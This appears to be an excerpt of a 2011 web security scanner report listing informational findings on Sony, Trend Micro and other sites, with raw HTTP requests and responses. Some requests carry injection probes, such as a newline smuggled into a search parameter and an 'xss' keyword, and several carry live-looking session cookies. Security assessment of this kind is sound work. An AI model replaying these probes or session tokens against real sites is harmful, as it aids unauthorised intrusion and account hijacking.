_ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 05 Aug 2011 21:36:13 GMT
Accept-Ranges: bytes
ntCoent-Length: 12440
Content-Type: application/x-javascript
Content-Length: 12440
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

/*******
The Tabbing class

AUTHOR: Jonathan Cheung, Sr. Flash Developer for Sony Style, Sony Electronics
DATE: Feb 16, 2010
DESCRIPTION:
This class can easily provide custom tabbing with deep linking
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Jun 2011 22:25:11 GMT
Accept-Ranges: bytes
ntCoent-Length: 15544
Content-Type: application/x-javascript
Content-Length: 15544
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; }
if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; }

//avoiding use of global variables.
//using a global object to store
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 01 Sep 2011 22:46:39 GMT
Accept-Ranges: bytes
ntCoent-Length: 15093
Content-Type: application/x-javascript
Content-Length: 15093
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; }
if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; }

//avoiding use of global variables.
//using a global object to store "glo
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

17. Robots.txt file
There are 7 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


17.1. http://blog.trendmicro.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.trendmicro.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.54
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
X-Varnish: 1696291583
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:29 GMT
Date: Tue, 06 Sep 2011 18:16:29 GMT
Content-Length: 614
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /trackback
Disallow: /comments
Disallow: /catego
...[SNIP]...

17.2. http://display.digitalriver.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: display.digitalriver.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:03 GMT
Server: Apache/2.2.9
Last-Modified: Wed, 27 Oct 2010 13:56:47 GMT
ETag: "18063c-1a-4939998a3e5c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

17.3. http://pastebin.com/i/fixed.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pastebin.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/plain
Content-Length: 178
Last-Modified: Thu, 30 Jun 2011 08:34:38 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /download.php
Disallow: /report.php
Disallow: /raw.php
Disallow: /embed.php
Disallow: /embed_iframe.php
Disallow: /embed_js.php
Disallow: /diff.php

17.4. https://store.trendmicro.com/store

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /store

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.trendmicro.com

Response

HTTP/1.1 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Connection: close
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=67000669097,0)
Content-Length: 73
Date: Thu, 02 Jun 2011 21:28:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Accept-Ranges: bytes

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.javalobby.org

Response

HTTP/1.0 200 OK
Server: Resin/3.2.1
ETag: "A/EKk8WQ8Th"
Last-Modified: Tue, 14 Oct 2008 18:02:16 GMT
Cache-Control: max-age=5
Expires: Tue, 06 Sep 2011 17:55:40 GMT
Content-Type: text/plain
Content-Length: 844
Date: Tue, 06 Sep 2011 17:55:35 GMT

User-Agent: Googlebot
Disallow: /account!default.jspa
Disallow: /account.jspa
Disallow: /av/javapolis/createorlogin!default.jspa
Disallow: /css
Disallow: /discussionContext/showThreaded/frm/javalobby

...[SNIP]...

17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.javaworld.com

Response

HTTP/1.1 200 OK
Age: 3946
Date: Tue, 06 Sep 2011 17:45:53 GMT
Cache-Control: max-age=600 ,public
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "7340c3-3e3-48824a805df80"
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=173.192.135.178.1315331027247935; path=/; expires=Thu, 05-Sep-13 17:43:47 GMT
Last-Modified: Thu, 03 Jun 2010 18:48:46 GMT
Accept-Ranges: bytes
Content-Length: 995
Content-Type: text/plain; charset=UTF-8

# This robot.txt file should turn on ALL robots, crawlers and worms for visting
# ALL of your pages. The URL I extracted this from is at:
#
# http://info.webcrawler.com/mak/projects/robots/norobots
...[SNIP]...

17.7. http://www.viddler.com/embed/dca1712/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /embed/dca1712/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:09 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 11 Oct 2010 13:24:54 GMT
ETag: "780767-23-492574927d580"
Accept-Ranges: bytes
Content-Length: 35
Vary: Accept-Encoding

User-Agent: *
Disallow: /search/?


18. Cacheable HTTPS response

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /favicon.ico HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0)
Content-Length: 894
Date: Thu, 02 Jun 2011 21:05:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes


...[SNIP]...

19. HTML does not specify charset
There are 4 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


19.1. http://display.digitalriver.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Request

GET /?aid=244&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:02 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:02 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:02 GMT
Content-Length: 206
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_scr
...[SNIP]...

19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

19.3. http://wd.sharethis.com/api/getCount2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 270

(function(){stButtons.processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\
...[SNIP]...

19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/bg_323232.html

Request

GET /selfservice/common/bg_323232.html HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"67-1196120688000"
Last-Modified: Mon, 26 Nov 2007 23:44:48 GMT
Content-Type: text/html
Content-Length: 67
Date: Tue, 06 Sep 2011 18:51:21 GMT

<html>
<head>
</head>
<body bgcolor="#323232">
</body>
</html>

20. Content type incorrectly stated
There are 6 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


20.1. http://display.digitalriver.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=244&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:02 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:02 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:02 GMT
Content-Length: 206
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_scr
...[SNIP]...

20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
